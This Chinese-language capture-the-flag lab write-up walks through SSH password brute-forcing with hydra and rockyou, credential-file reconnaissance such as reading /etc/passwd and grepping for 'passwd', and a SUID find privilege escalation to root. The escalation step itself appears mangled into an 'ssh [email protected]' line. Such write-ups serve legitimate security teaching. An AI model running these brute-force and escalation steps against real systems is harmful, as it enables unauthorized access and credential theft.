第四个flag
我们通过账户文件发现flag4是个用户,那我们就使用hydra进行暴力破解
cat /etc/passwd
hydra(九头蛇)是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。
cd /usr/share/wordlists
gunzip rockyou.txt.gz
Rochyou.txt是一个压缩文件,那我们先进解压
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://172.30.1.140
我们通过爆破发现这个flag4的密码为orange
ssh [email protected]
我们使用SSH进行远程登录
根据Flag3的提示,可以使用find越权
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
提权
提权之前的信息收集(很重要,增加渗透攻击面)
(1)IP地址
/sbin/ifconfig
(2)当前用户
whoami
(3)内核版本
uname -r
(4)开放的端口
netstat -tunlp
(5)进程
ps aux
(6)账户信息
cat /etc/passwd
(7)主机名
hostname
(8)任务计划
crontab -l
(9)敏感文件
grep “passwd” -R /
(10)发行版本
lsb_release -a
find命令越权
ssh [email protected]
这样我们通过看命令提示符就可以看到这是root用户
第五个flag
cd /root
cat thefinalflag.txt
我们cd切换到root就可以看到第五个flag了